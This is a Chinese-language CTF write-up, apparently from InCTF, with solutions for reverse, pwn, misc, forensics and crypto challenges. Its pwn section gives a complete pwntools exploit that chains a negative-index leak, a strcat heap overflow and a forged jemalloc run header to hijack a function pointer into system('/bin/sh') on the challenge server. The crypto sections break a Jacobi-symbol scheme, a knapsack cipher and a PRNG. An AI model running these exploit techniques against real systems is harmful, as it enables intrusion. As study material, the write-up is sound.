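        0x61, 0x64, 0x75, 0x3A, 0x63, 0x77, 0x46, 0x52, 0x61, 0x64, 0x5C, 0x49, 0x61, 0x66, 0x58, 0x72,
        0x61, 0x66, 0x4E, 0x78, 0x6D, 0x66, 0x45, 0x6C, 0x63, 0x77, 0x45, 0x6C, 0x61, 0x66, 0x4A, 0x76,
        0x61, 0x66, 0x78, 0x39, 0x64, 0x66, 0x34, 0x7C, 0x64, 0x64, 0x38, 0x6D, 0x6D, 0x66, 0x48, 0x7E,
        0x63, 0x77, 0x48, 0x7E, 0x6D, 0x66, 0x54, 0x7E, 0x63, 0x77, 0x54, 0x7E, 0x61, 0x66, 0x6B, 0x46,
        0x61, 0x66, 0x76, 0x70, 0x64, 0x66, 0x6A, 0x35, 0x64, 0x64, 0x7D, 0x53, 0x61, 0x66, 0x56, 0x52,
        0x6D, 0x66, 0x46, 0x70, 0x6D, 0x66, 0x50, 0x7C, 0x6D, 0x66, 0x54, 0x68, 0x6D, 0x66, 0x4E, 0x4C,
        0x6D, 0x66, 0x35, 0x5A, 0x63, 0x77, 0x46, 0x70, 0x63, 0x77, 0x50, 0x7C, 0x63, 0x77, 0x5C, 0x78,
        0x63, 0x77, 0x3D, 0x37, 0x63, 0x77, 0x79, 0x6E, 0x63, 0x77, 0x47, 0x7C, 0x63, 0x77, 0x54, 0x68,
        0x63, 0x77, 0x4E, 0x4C, 0x63, 0x77, 0x5C, 0x70, 0x63, 0x77, 0x49, 0x5E, 0x63, 0x77, 0x35, 0x5A,
        0x63, 0x77, 0x4F, 0x54, 0x00
    };

    // Translate every record into the menu input that produces that event.
    // The bound is "i + 3 < total" so a whole 4-byte record is always inside
    // the array; the trailing 0x00 terminator is therefore never treated as a
    // record (the original loop relied on short-circuit evaluation for that).
    const int total = sizeof(a);
    for (int i = 0; i + 3 < total; i += 4)
    {
        const char kind = a[i];
        const char what = a[i + 1];
        const char *menu = 0;  // option sent before the two name characters
        const char *tail = ""; // option sent after the name, if any

        if (kind == 'c' && what == 'f')
            menu = "1"; // create file: open only
        else if (kind == 'c' && what == 'w')
        {
            menu = "1"; // open, then close the stream
            tail = "2";
        }
        else if (kind == 'm' && what == 'f')
        {
            menu = "1"; // open, then write to the stream
            tail = "3";
        }
        else if (kind == 'd' && what == 'f')
            menu = "4"; // unlink
        else if (kind == 'a' && (what == 'f' || what == 'd'))
            menu = "5"; // chmod, same option for files and directories
        else if (kind == 'd' && what == 'd')
            menu = "6"; // rmdir
        else if (kind == 'c' && what == 'd')
            menu = "7"; // mkdir

        // Unknown tags produce no output, exactly as before.
        if (menu)
            cout << menu << char(a[i + 2] - 4) << char(a[i + 3] - 4) << tail;
    }
    // NOTE(review): system() is declared in <cstdlib>, which this listing does
    // not include directly; "pause" is also a Windows-only shell command.
    system("pause");
}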
得到1hV4tT41B1HX25oQ6La6yQ4hV5jz55P325eh6GU5IZ4tN1AJ326Ti4XN5bX4wt6HW5ae5Fg4S11eP263U4Zv5gG16f25aq4Q94fz6Wy4I51l324dj1Pf326uM4bp61Q4Et6Cu4cj6fU4mV1mL21bl24hH6Qk5zr6Sm5VF49P1wV21xB326jg5Qc4fX4nZ6YO4CF1sF24Bp1vB21TR21Ax21gL26SI6Ye5q61BN25XE5Tn5Jt1Ah325Fr5t540x64i1Dz321Pz325gB5rl4f16yO5RN1Bl31Lx31Pd31JH311V3221Xt219321uj21Cx2221Xl21EZ221KP28
最后输入发现有错误, 调试之后发现, 从SafVR之后开始, 这里完全倒了过来,
要求的s1:mfFpmfP|mfThmfNLmf5ZcwFpcwP|cw\xcw=7cwyncwG|cwThcwNLcw\pcwI^cw5ZcwOT
生成的s1:mf5Zcw5ZmfNLcwNLcw\xcw=7cwyncwG|mfThcwThmfP|cwP|cw\pcwI^mfFpcwFpcwOT
具体调试了函数之后(前面有一个闹钟记得patch掉), 这里mf之后并没有把字符串写入, 是在fclose文件指针之后把文件修改, 那到底怎么连续修改之后再关闭文件指针呢, 这里我试了一下exit来关闭文件指针,把输入后面改成:
1hV4tT41B1HX25oQ6La6yQ4hV5jz55P325eh6GU5IZ4tN1AJ326Ti4XN5bX4wt6HW5ae5Fg4S11eP263U4Zv5gG16f25aq4Q94fz6Wy4I51l324dj1Pf326uM4bp61Q4Et6Cu4cj6fU4mV1mL21bl24hH6Qk5zr6Sm5VF49P1wV21xB326jg5Qc4fX4nZ6YO4CF1sF24Bp1vB21TR21Ax21gL26SI6Ye5q61BN25XE5Tn5Jt1Ah325Fr5t540x64i1Dz321Pz325gB5rl4f16yO5RN(这里开始修改)
1KP11V31EZ1Xl1JH31Pd31Cx1uj1931Xt1Lx31Bl38, 成功得到flag
pwn
Ancient_House
比较特殊的漏洞利用相关的点有以下三个,
p_func堆块内保存函数指针
程序在最开始设置p_func
, 然后最后又进行调用,
通过汇编层的查看我们可以知道, 这个堆块p_func
中, p_func[0]
为函数地址, p_func[1]
为函数参数1, 而且程序给了system函数地址, 我们的目标应该就是覆写这个p_func
堆块,
负数数组越界
在battle功能中, 输入idx
的时候没有经过什么校验, 存在一个负数数组越界的问题,
通过这个漏洞我们可以往上查找到chunklist前面的地址, 进行数据泄漏和修改,
而且要是保存地址内数据还是一个name地址,
最后我们找到了这里, 这个位置在曾经也被用作数据泄漏, 他是一个指向自己的指针, 这样我们可以把这个地址泄漏出来, 得到pie的偏移量.
值得注意的另一个点是, max_chunks
在他后面, 并且恰好是chunk_list[idx]->health
的位置, 计算后得到一个负数(5-15=-10),
并且因为这个max_chunks
数据是一个unsigned int 类型数据, 在add中的数量限制也被解除了,
my_strcat堆溢出
这个是后面才发现的漏洞, 这个点卡住了很久,
在两个人物合并的时候, 会对他们的名字进行一次拼接, 这时候调用了my_strcat函数:
这里值得注意的是循环赋值里面, buf2内容赋值给buf1, 但是复制的长度却是buf1_size+buf2_size
, 这里构造了一个溢出,
于是可以多写入buf2后面的一段内容, 这段内容我们也可以通过堆风水来构造,
利用
开始使用时, 内存布局,
size: addr-$heap_base
0x10: 0x6000
0x40: 0x7000
0x50: 0x8000
0x20: 0xa000
jemalloc的分配机制, 其实run并不会指定顺序, 只是malloc触发bin初始化获取到一个run就拿来用, 因此最开始三次malloc, 分别0x10, 0x40, 0x50, 已经被分配了,后续0x18(其实是0x20同一个run)会占一个, 如果出现新的大小就会使用新的未使用run补上,
另外我们看下具体p_func
的位置:
前面标记的部分是run结构体, 后续0x60开始是第一个region, 也就是p_func
,
我们的目标就是覆写这个位置,
因为我们目标是修改0x50的p_func, 如果在前面的0x40处向后覆写, 0x40最多写到0x8000-1的位置, p_func在0x8060,
而利用合并的话0x40由两个0x20合并, 则能溢出范围是0x8000-0x8020, 可以参考前面p_func的内存数据, 这0x20正好是run结构体, 于是我们可以尝试修改0x50的run结构体,
而且jemalloc的分配机制, 在run中, 就是靠这个结构体内数据+run基地址偏移找到region的, 我们应该可以直接修改为p_func未分配出来或者已经被free的状态,
这里补一句, 最开始我尝试在某次调用free修改参数为p_func指针, 并获取到free运行后这个run的状态, 但是因为此时没有在使用region, run也被回收, 他的run->magic位置为null, 也就是整个run被认为是未初始化状态, 但是同时bin(0x50)->runcur=null,
如果我们这样利用, 因为bin(0x50)->runcur中仍然是这个run, 此时就会抛出错误,
于是我们设置run->magic=magic, 然后其他位置和free后一致,
payload = flat(0x00000000384adf93, bin, 0x0000003200000001, 0x0003ffffffffffff)
这时候会认为, run内的region都未使用, 通过偏移查找到p_func位置作为第一个被取出的region返回,
注意这个bin, 相对堆地址不变, 泄漏堆地址以后可以得到,
因为溢出使用的是0x20的region, 但是chunk结构体本身是0x18, 也在0x20的run中, 因此这个run中的排布是chunk-name-chunk-name-chunk-name
, 这样溢出0x20字节也只是将name2后续的chunk写入到run结构体中,
这里我们利用free不会清空的机制,
首先malloc(0x20)+free, 使内存排布为chunkF-nameF-chunkF-nameF-chunkF-nameF
然后我们malloc(0x60)// 或者size只要不是0x20即可, 这样可以打乱原本的布局, 然后再次malloc(0x20)用于合并, 现在是: chunk-chunk-name-nameF-chunkF-nameF
,
具体思路
首先泄漏pie和堆地址,
然后不断malloc(0x40), 留下0x7000这个run中的最后一个region,
然后合并两个0x20的人物,(会调用realloc(0x40)这个只是malloc+free而已), 此时获取到0x7000这个run中的最后一个region, 溢出0x20, 修改0x8000-0x8020, 即0x8000这个run的run结构体, 修改为没有region被使用的状态,
我们将/bin/sh\x00
字符串写入到一个堆块中, 通过堆基地址可以找到, 当作参数1, pie泄漏, system地址使用plt表地址即可,
malloc(0x50), 从0x8000run中取出第一个region, 此时和p_func重合, 我们写入flat(system, binsh)
, 然后退出, 在程序最后激活system(binsh)
即可.
from pwn import *
context.arch='amd64'
# context.log_level = 'debug'
def add(size, name):
    """Drive menu option 1: create an entry with the given size and name.

    All replies go through the module-level ``sla`` helper, which waits for
    the prompt before sending one line.
    """
    dialogue = (
        (">> ", '1'),
        ("nter the size : ", str(size)),
        ("nter name : ", name),
    )
    for prompt, answer in dialogue:
        sla(prompt, answer)
def battle(id):
    """Drive menu option 2 against the entry with index ``id``.

    The index is forwarded as typed; this script also passes a negative
    value, which the writeup says the target does not validate.
    """
    choice, target = '2', str(id)
    sla(">> ", choice)
    sla("nter enemy id : ", target)
def merga(id1, id2):
    """Drive menu option 3: merge entries ``id1`` and ``id2``.

    Per the writeup, the merge concatenates both names inside the target.
    """
    for prompt, answer in ((">> ", '3'), ("id 1:", str(id1)), ('id 2:', str(id2))):
        sla(prompt, answer)
def kill(idx):
    """Battle entry ``idx`` seven times, then answer the next prompt with '1'.

    NOTE(review): the page lost its indentation. ``sl('1')`` is placed after
    the loop because ``exp()`` follows the same pattern (seven battles in
    total, then a single '1'); confirm against the original script.
    """
    for i in range(7):
        battle(idx)
    sl('1')
def exp():
    """Replay the interaction sequence from the writeup against the challenge.

    The surrounding text attributes the whole chain to two defects in the
    target: ``battle`` accepts a negative index without validation, and
    ``my_strcat`` copies ``buf1_size + buf2_size`` bytes out of ``buf2``.
    Bounds-checking the index and copying only ``buf2_size`` bytes would
    remove both primitives.

    NOTE(review): indentation was lost on the page; the loop bodies below are
    reconstructed (see ``kill``) and should be checked against the original.
    """
    sl("b"* 0x20)
    # Stage 1: the negative index reads a pointer stored before the chunk
    # list (described in the text as pointing to itself), giving the image base.
    battle(-7)
    ru("Starting battle with ")
    leak = u64(re(6, 2).ljust(8, b'\x00'))
    PIE = leak - 0x4008
    print("pie: ")
    print(hex(PIE))
    slog['PIE'] = PIE
    sl('2')
    # Stage 2: allocate and release two entries, then read a new entry's name
    # back to obtain a heap address (the text notes freed memory is not cleared).
    add(0x60, '1' * 0x20) # 0
    add(0x60, '1' * 0x20) # 1
    kill(0)
    kill(1)
    add(0x20, '') # 2
    battle(2)
    ru("Starting battle with ")
    leak = u64(re(6, 2).ljust(8, b'\x00'))
    heap = leak - 0xb00a
    # NOTE(review): the label says "pie" but the value printed next is the heap base.
    print("pie: ")
    print(hex(heap))
    slog['heap'] = heap
    # NOTE(review): this local shadows the builtin bin(); it holds the bin
    # address that the text says sits at a fixed offset from the heap base.
    bin = 0x800d70 + heap
    slog['bin'] = bin
    add(0x20, 'a' * 0x20) # 3
    for i in range(6):
        battle(2)
    sl('1')
    kill(3)
    # add(0x20, '1' * 0x20) # 4
    # add(0x20, '2' * 0x20) # 5
    # Stage 3: consume the 0x40 size class so that, per the text, only the
    # last region of that run is left for the merge.
    for i in range (61):
        add(0x40, 'a'*0x40)
    # 0xa7e0 0xa800
    add(0x20, '/bin/sh\x00') # 65
    binsh = heap + 0xa800
    # 0x820
    add(0x20, '2' * 0x20) # 66
    # add(0x20, '3' * 0x20) # 67
    # Four 8-byte words that the text describes as a run header with no
    # region in use; the first word is the magic value.
    payload = flat(0x00000000384adf93, bin, 0x0000003200000001, 0x0003ffffffffffff)
    # paylaod = 'a' * 0x20
    add(0x20, payload) # 67
    add(0x20, '4' * 0x20) # 68
    add(0x20, '5' * 0x20) # 69
    add(0x20, '6' * 0x20) # 70
    kill(66)
    kill(67)
    kill(68)
    kill(69)
    add(0x60, 'z' * 0x60) # 71
    add(0x20, '1' * 0x20) # 72 index2
    # Stage 4: the merge goes through my_strcat, whose over-long copy is what
    # writes past the merged name.
    merga(70, 72)
    system = PIE + 0x000000000001170
    # NOTE(review): "paylaod" is a misspelling of "payload"; it is used
    # consistently on the next line, so behaviour is unaffected.
    paylaod = flat(system , binsh)
    add(0x50, paylaod) # p_func
    sl('4')
# Run mode comes from the first command-line argument: non-zero starts the
# local binary, zero connects to the remote service.
local = int(sys.argv[1])
slog = {'name' : 111}
cn = process('./bin') if local else remote("pwn.challenge.bi0s.in", 1230)


# Short aliases over the connection object, used throughout the script.
# NOTE(review): ``re`` shadows the name of the standard-library ``re`` module.
def re(m, t):
    return cn.recv(numb=m, timeout=t)


def recv():
    return cn.recv()


def ru(x):
    return cn.recvuntil(x)


def rl():
    return cn.recvline()


def sd(x):
    return cn.send(x)


def sl(x):
    return cn.sendline(x)


def ia():
    return cn.interactive()


def sla(a, b):
    # after a, send b;
    return cn.sendlineafter(a, b)


def sa(a, b):
    return cn.sendafter(a, b)


def sll(x):
    return cn.sendlineafter(':', x)
def slog_show():
    """Log every value recorded in ``slog`` as ``name ==> hex(value)``."""
    for label, value in slog.items():
        success(label + ' ==> ' + hex(value))
# Entry sequence: run the interaction, print the recorded addresses, then
# hand the connection over to the terminal.
exp()
slog_show()
cn.interactive()
misc
alpha pie
nc misc.challenge.bi0s.in 1337
每回合会给一个方阵,对左侧字符进行上下左右的平移,在一定次数内是左边方阵等于右边,
移动指令:from.x,from.y,to.x,to.y
(示例:图中t向左一格的指令为:0,3,0,2)
从0开始,上下为x,左右为y
最少拐弯问题
from pwn import *
import copy
# Debug logging prints every byte exchanged with the service.
context.log_level = 'debug'
# Module-level connection shared by recv_level() and solve().
p = remote("misc.challenge.bi0s.in", 1337)
p.sendlineafter(b"Press 'y' to start: ", b"y")
def recv_level():
    """Read one level from the service.

    Returns ``(mat1, mat2, max_moves)``: the left and right boards as lists
    of rows of ``bytes`` cells, and the move limit announced by the server.
    Each received row holds both boards side by side, so it is split in half.
    """
    p.recvuntil(b"Max number of moves allowed:")
    max_moves = int(p.recvline(), 10)
    p.recvline()

    left_board, right_board = [], []
    while True:
        row = p.recvline().strip().replace(b" ", b"")
        # A border line ends the board.
        if b'+-------' in row:
            break
        cells = list(filter(None, row.split(b"|")))
        half = len(cells) // 2
        left_board.append(cells[:half])
        right_board.append(cells[half:])
    return left_board, right_board, max_moves
def get_fucks(mat):
    """Return the ``(x, y)`` position of every non-empty cell, row by row.

    A cell is empty when it equals ``b'0'``; ``x`` is the column index and
    ``y`` the row index.
    """
    occupied = []
    for y, row in enumerate(mat):
        for x, cell in enumerate(row):
            if cell != b'0':
                occupied.append((x, y))
    return occupied
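def make_hist(start_p, end_p, mat, hist):
    """Record in ``hist`` the cells a piece passes over on a straight move.

    Args:
        start_p: ``(x, y)`` the piece moves from.
        end_p: ``(x, y)`` the piece moves to; must share a row or a column
            with ``start_p``.
        mat: board as a list of rows; ``mat[y][x]`` is the moving piece.
        hist: per-cell lists, indexed ``hist[y][x]``; the piece symbol is
            appended to every cell from the smaller coordinate up to, but
            not including, the larger one.

    Raises:
        ValueError: if the move is neither horizontal nor vertical.

    The original compared ``start_p[1]`` with itself, so the horizontal
    branch always matched and a diagonal move was silently recorded as a
    horizontal one; the check now compares against ``end_p``.
    """
    sym = mat[start_p[1]][start_p[0]]

    if start_p[0] == end_p[0]:  # same column: the y coordinate changes
        low, high = sorted((start_p[1], end_p[1]))
        for y in range(low, high):
            hist[y][start_p[0]].append(sym)
        return

    if start_p[1] == end_p[1]:  # same row: the x coordinate changes
        low, high = sorted((start_p[0], end_p[0]))
        for x in range(low, high):
            hist[start_p[1]][x].append(sym)
        return

    raise ValueError("move must be horizontal or vertical: %r -> %r" % (start_p, end_p))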
def gen_next(mat1, targetPos, history, curPoint):
    """List the cells the piece at ``curPoint`` may slide to in one move.

    The piece slides left, right, up and down in turn. In each direction it
    keeps going while the next cell is on the board, the symbol in the cell
    it currently stands on is not in that cell's history, the next cell is
    empty (``b'0'``) and the step does not overshoot the piece's target
    coordinate. One end position per direction is returned, in that order;
    a piece already on its target yields no moves.

    NOTE(review): the history test reads the cell being stood on, which is
    ``b'0'`` after the first step, so it only restricts the first step of a
    slide. That is preserved here as-is.
    """
    col, row = curPoint[0], curPoint[1]
    assert mat1[row][col] != b'0'
    goal = targetPos[mat1[row][col]]
    if goal == (col, row):
        return []

    # (dx, dy, still-on-board test, not-past-target test), in original order.
    directions = (
        (-1, 0, lambda nx, ny: nx >= 0, lambda nx, ny: nx >= goal[0]),
        (1, 0, lambda nx, ny: nx < len(mat1[0]), lambda nx, ny: nx <= goal[0]),
        (0, -1, lambda nx, ny: ny >= 0, lambda nx, ny: ny >= goal[1]),
        (0, 1, lambda nx, ny: ny < len(mat1), lambda nx, ny: ny <= goal[1]),
    )

    reachable = []
    for dx, dy, on_board, within_goal in directions:
        cx, cy = col, row
        while True:
            nx, ny = cx + dx, cy + dy
            if not on_board(nx, ny):
                break
            if mat1[cy][cx] in history[ny][nx]:
                break
            if mat1[ny][nx] != b'0':
                break
            if not within_goal(nx, ny):
                break
            cx, cy = nx, ny
        if (cx, cy) != (col, row):
            reachable.append((cx, cy))
    return reachable
def printMat(mat):
    """Print the board one row per line, cells separated by spaces.

    Each cell is followed by a single space (so lines end with one), and a
    separator line is printed after the last row.
    """
    for row in mat:
        print("".join(cell.decode('ascii') + " " for cell in row))
    print("=============")
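def solve():
    """Solve one level: search for a move list and send it to the service.

    Reads the two boards and the move limit with ``recv_level``, runs a
    depth-first search over straight slides (``gen_next``) and, when a
    sequence of at most ``max1`` moves turns the left board into the right
    one, sends each move as ``from.x,from.y,to.x,to.y`` in the service's
    convention (its x is the row, its y is the column).

    Changes from the original listing:
      * the history grid is built as rows x columns, matching the
        ``history[y][x]`` indexing used by ``gen_next`` and ``make_hist``
        (the original swapped the two sizes, which only works for square
        boards);
      * ``None`` is tested with ``is``/``is not``;
      * the dead local assignment ``solved = track`` inside the search is
        removed;
      * a branch is dropped as soon as it has used ``max1`` moves without
        matching, because any longer track would be rejected anyway.
    """
    mat1, mat2, max1 = recv_level()

    # Where each symbol has to end up, keyed by the symbol itself.
    targetPos = {
        cell: (x, y)
        for y, row in enumerate(mat2)
        for x, cell in enumerate(row)
        if cell != b'0'
    }

    def dfs(board, history, track):
        # printMat(board)
        if board == mat2:
            print("find:", track)
            if len(track) <= max1:
                print("real find:", track)
                return track
            return None
        if len(track) >= max1:
            return None

        for piece in get_fucks(board):
            for dest in gen_next(board, targetPos, history, piece):
                next_board = copy.deepcopy(board)
                next_hist = copy.deepcopy(history)
                # History is recorded from the board as it was before the move.
                make_hist(piece, dest, board, next_hist)
                next_board[dest[1]][dest[0]] = next_board[piece[1]][piece[0]]
                next_board[piece[1]][piece[0]] = b'0'
                found = dfs(next_board, next_hist, track + [(piece, dest)])
                if found is not None:
                    return found
        return None

    hist = [[[] for _ in range(len(mat1[0]))] for _ in range(len(mat1))]
    solved = dfs(mat1, hist, [])
    if solved is not None:
        for (from_col, from_row), (to_col, to_row) in solved:
            # Internal points are (column, row); the service wants row first.
            tt = "%d,%d,%d,%d" % (from_row, from_col, to_row, to_col)
            p.sendlineafter(",to-y-cord ' : ", tt)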
# The script plays nine levels in a row, then hands the connection to the
# terminal.
for i in range(9):
    solve()
p.interactive()
forensics
Ermittlung
进程是msimn.exe
, outlook的程序,
进程名: Outlook_Express
时间: 2020-07-27 12:26:17
参考文章 其中第19条表示相关信息储存在NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\UnreadMail
, 我尝试在文件中搜索NTUSER.DAT
, 成功找到几个, 然后导出文件.
之后找到了这个文章简单讲述了如何分析NTUSER.DAT
文件, 其实这个是个windows注册表文件, 使用Registry Explorer可以分析,
然后我们得到未读信息和版本号,
未读信息数量: 4
版本号: 6.0.2900.5512
flag: inctf{Outlook_Express_27-07-2020_12:26:17_4_6.0.2900.5512}
crypto
gold_digger
def encrypt(msg, N, x):
    """Encrypt ``msg`` bit by bit and return one ciphertext integer per bit.

    For every bit a random ``r`` coprime to ``N`` is drawn and the exponent
    is built by appending the bit to the binary form of ``r``, i.e. it
    equals ``2*r + bit``. Each ciphertext is therefore
    ``(x**r * r)**2 * x**bit mod N``: a square times ``x**bit``.

    NOTE(review): only the parity of the exponent depends on the message bit,
    so whether a ciphertext is a square (times ``x``) reveals that bit. The
    solver in this writeup reads it off with the Jacobi symbol.
    """
    bits = bin(bytes_to_long(msg))[2:]
    ciphertexts = []
    for bit in bits:
        # Redraw until r is invertible modulo N.
        r = random.randint(1, N)
        while gcd(r, N) != 1:
            r = random.randint(1, N)
        exponent = int(bin(r)[2:] + bit, 2)
        ciphertexts.append((pow(x, exponent, N) * r ** 2) % N)
    return ciphertexts
这里可以写成
$c = x^{2r+i} \cdot r^2 \bmod N = (x^r \cdot r)^2 \cdot x^i \bmod N$, 因为 int(bin_r + i, 2) 等于 2r+i
如果 flag 第 i 位为 1, 指数 2r+1 为奇数, 此时 c 是一个平方数乘以 x
否则指数 2r 为偶数, c 本身就是平方数
通过这个条件,可以利用雅可比符号计算二次剩余的存在性来判断flag第i位的值
solution
from Crypto.Util.number import *
import gmpy2
from data import ct
N = 76412591878589062218268295214588155113848214591159651706606899098148826991765244918845852654692521227796262805383954625826786269714537214851151966113019
x = 72734035256658283650328188108558881627733900313945552572062845397682235996608686482192322284661734065398540319882182671287066089407681557887237904496283
# One ciphertext per message bit: a Jacobi symbol of -1 is read as bit 1,
# anything else as bit 0. This relies on jacobi(x, N) being -1 for the given
# x, which the loop itself does not check.
plaintext = ''.join('1' if gmpy2.jacobi(c, N) == -1 else '0' for c in ct)
print(long_to_bytes(int(plaintext, 2)))
# inctf{n0w_I_4in7_73ll1ng_u_4_g0ldd1gg3r}
Lost Baggage
格解背包
sagemath lattice reduction code:
import pickle
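# NOTE(review): pickle.load runs code embedded in the file it reads. Only load
# enc.pickle when it comes from a source you trust (here: the challenge
# bundle), ideally inside a throwaway environment.
with open('enc.pickle', 'rb') as fh:
    data = pickle.load(fh)
cip = data['cip']
pbkey = data['pbkey']
print(len(pbkey))

S = cip
M = pbkey
n = len(M)

# Knapsack lattice: row i carries 2 on the diagonal and the i-th public
# weight in the last column; the last row is all ones with the target sum S
# in the corner.
L = matrix.zero(n + 1)
for row, x in enumerate(M):
    L[row, row] = 2
    L[row, -1] = x
L[-1, :] = 1
L[-1, -1] = S

res = L.LLL()

# The file is opened in append mode, so re-running adds the rows again. The
# context manager makes sure the handle is flushed and closed.
with open('LLLdata.txt', 'a+') as f:
    for i in range(144):
        ans = list(res[i])
        f.write(str(ans) + '\n')
        print(ans)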
用以下矩阵构造
将LLLdata.txt里面每一行向量都拿出来试一遍就得到flag了
from Crypto.Util.number import *
ans = [-1, 1, -1, -1, -1, -1, -1, 1, -1, -1, -1, -1, -1, -1, 1, 1, -1, -1, -1, 1, 1, -1, -1, 1, 1, 1, -1, 1, -1, -1, 1, 1, 1, -1, 1, 1, 1, -1, -1, 1, -1, -1, -1, -1, -1, 1, -1, 1, 1, 1, -1, 1, -1, -1, 1, 1, -1, 1, -1, -1, 1, -1, -1, 1, -1, -1, -1, -1, -1, 1, -1, 1, -1, 1, -1, 1, -1, -1, 1, 1, 1, -1, 1, 1, -1, -1, -1, 1, -1, -1, -1, 1, -1, -1, -1, 1, -1, -1, 1, -1, -1, -1, -1, 1, 1, -1, -1, 1, 1, -1, -1, 1, 1, 1, -1, 1, -1, -1, -1, 1, -1, -1, 1, 1, 1, -1, -1, 1, 1, -1, -1, -1, 1, -1, -1, 1, -1, 1, 1, -1, 1, -1, -1, 1]
# Decode the candidate vector under both readings: first with -1 meaning
# bit 1, then with -1 meaning bit 0. The bit string is reversed before it is
# turned into an integer.
for minus_one_bit, other_bit in (('1', '0'), ('0', '1')):
    flag = ''.join(minus_one_bit if entry == -1 else other_bit for entry in ans)
    msg = int(flag[::-1], 2)
    print(long_to_bytes(msg))
# inctf{wr5_m4_b4g?}
Right Now Generator
主要难度在逆向上面
def wrap(self, pr=True):
    """Refresh the whole state in place and reset the output counter.

    Each entry is XORed with ``self.pad`` and multiplied, modulo
    ``self.mod``, by the entry half the state away. The update is
    sequential, so the second half is mixed with already-updated first-half
    values. ``pr`` is accepted but not used in this listing.
    """
    size = self.sze
    offset = size // 2
    state = self.seed
    for idx in range(size):
        partner = state[(idx + offset) % size]
        state[idx] = ((state[idx] ^ self.pad) * partner) % self.mod
    self.ctr = 0
def next(self):
    """Return the next output and advance the counter.

    The output is ``k*seed[ctr] - seed[ctr ^ 1]`` modulo ``self.mod`` with
    ``k = 2`` on even counters and ``k = 1`` on odd ones. Entries
    ``ctr ^ 2`` and ``ctr ^ 3`` are read as well but do not influence the
    result. After the 64th output the state is refreshed with ``wrap``.

    NOTE(review): each output is a linear combination of two state words, so
    an observer of consecutive outputs can solve for the state; the writeup's
    ``from_aa_get_seed`` does exactly that.
    """
    head, neighbour, _third, _fourth = [self.seed[self.ctr ^ off] for off in range(4)]
    scale = 2 if self.ctr % 2 == 0 else 1
    out = (scale * head - neighbour) % self.mod
    self.ctr += 1
    if self.ctr == 64:
        self.wrap(pr=False)
    return out
主要难度在上面两个函数的逆向上面
可以轻易地写出反函数
由a序列得到seed序列的:
def from_aa_get_seed(aa):
    """Rebuild the 64 state words from 64 consecutive generator outputs.

    Outputs are taken four at a time. With ``a1 = 2*s0 - s1`` and
    ``a2 = s1 - s0`` it follows that ``s0 = a1 + a2`` and
    ``s1 = a1 + 2*a2``; the second pair of each group is solved the same
    way. All arithmetic is modulo the module-level ``mod``.
    """
    seed = []
    for start in range(0, 63, 4):
        a1, a2, a3, a4 = aa[start:start + 4]
        seed.extend((
            (a1 + a2) % mod,
            (2 * a2 + a1) % mod,
            (a3 + a4) % mod,
            (2 * a4 + a3) % mod,
        ))
    return seed
inv_wrap:
def inv_wrap(seed):
    """Undo one ``wrap`` step on a 64-word state, in place, and return it.

    The second half is restored first, because ``wrap`` mixed it with the
    already-updated first half; the first half is then restored using the
    recovered second half. Uses the module-level ``mod`` and ``pad``.

    NOTE(review): assumes every divisor is invertible modulo ``mod`` and
    that the pre-wrap ``value ^ pad`` was below ``mod``; neither is checked.
    """
    half = 32
    for low in range(half):
        high = low + half
        seed[high] = ((seed[high] * libnum.invmod(seed[low], mod)) % mod) ^ pad
    for low in range(half):
        high = low + half
        seed[low] = ((seed[low] * libnum.invmod(seed[high], mod)) % mod) ^ pad
    return seed
组合到一起就完事
Solution
import random, hashlib, os, gmpy2, pickle
import libnum
from libnum.modular import invmod
from Crypto.Util.number import *
from Crypto.Cipher import AES
# -----------------------------------
# Constants shared by the inversion helpers below.
pad = 0xDEADC0DE  # XOR mask applied in inv_wrap
sze = 64  # number of state words; not referenced elsewhere in this listing
mod = 18446744073709551629  # 2**64 + 13
def inv_wrap(seed):
    """Reverse one state refresh on a 64-word list, in place, and return it.

    Words 32..63 are recovered first from the refreshed words 0..31, then
    words 0..31 from the recovered upper half. ``mod`` and ``pad`` are the
    module-level constants.

    NOTE(review): a zero (non-invertible) word makes ``libnum.invmod`` fail
    or return an unusable value; the script does not guard against that.
    """
    def undo(value, partner):
        # Divide out the partner modulo mod, then strip the XOR mask.
        return ((value * libnum.invmod(partner, mod)) % mod) ^ pad

    for i in range(32):
        seed[i + 32] = undo(seed[i + 32], seed[i])
    for i in range(32):
        seed[i] = undo(seed[i], seed[i + 32])
    return seed
def from_aa_get_seed(aa):
    """Solve for the state words behind 64 consecutive outputs.

    Every group of four outputs ``(a1, a2, a3, a4)`` yields four state
    words: ``a1 + a2``, ``a1 + 2*a2``, ``a3 + a4`` and ``a3 + 2*a4``, all
    reduced modulo the module-level ``mod``.
    """
    recovered = []
    offset = 0
    while offset < 63:
        a1, a2, a3, a4 = aa[offset:offset + 4]
        recovered += [
            (a1 + a2) % mod,
            (2 * a2 + a1) % mod,
            (a3 + a4) % mod,
            (2 * a4 + a3) % mod,
        ]
        offset += 4
    return recovered
def from_leak_get_aa(leak):
    """Split the 1024-character hex leak into 64 big-endian 64-bit integers.

    Every 16 hex characters form one generator output.
    """
    return [
        bytes_to_long(bytes.fromhex(leak[pos:pos + 16]))
        for pos in range(0, 1024, 16)
    ]
def next(seed1, i):
    """Compute the generator output for counter value ``i`` from ``seed1``.

    Stateless re-implementation of the generator's output step: the result
    is ``k*seed1[i] - seed1[i ^ 1]`` modulo ``2**64 + 13`` with ``k = 2``
    for even ``i`` and ``k = 1`` for odd ``i``. Entries ``i ^ 2`` and
    ``i ^ 3`` are read too, so they must exist, but they do not affect the
    value returned.
    """
    ctr = i
    head, neighbour, _third, _fourth = [seed1[ctr ^ off] for off in range(4)]
    mod = 18446744073709551629
    # The multiplier alternates between 2 and 1 and depends only on the counter.
    k = 2 if ctr % 2 == 0 else 1
    return (k * head - neighbour) % mod
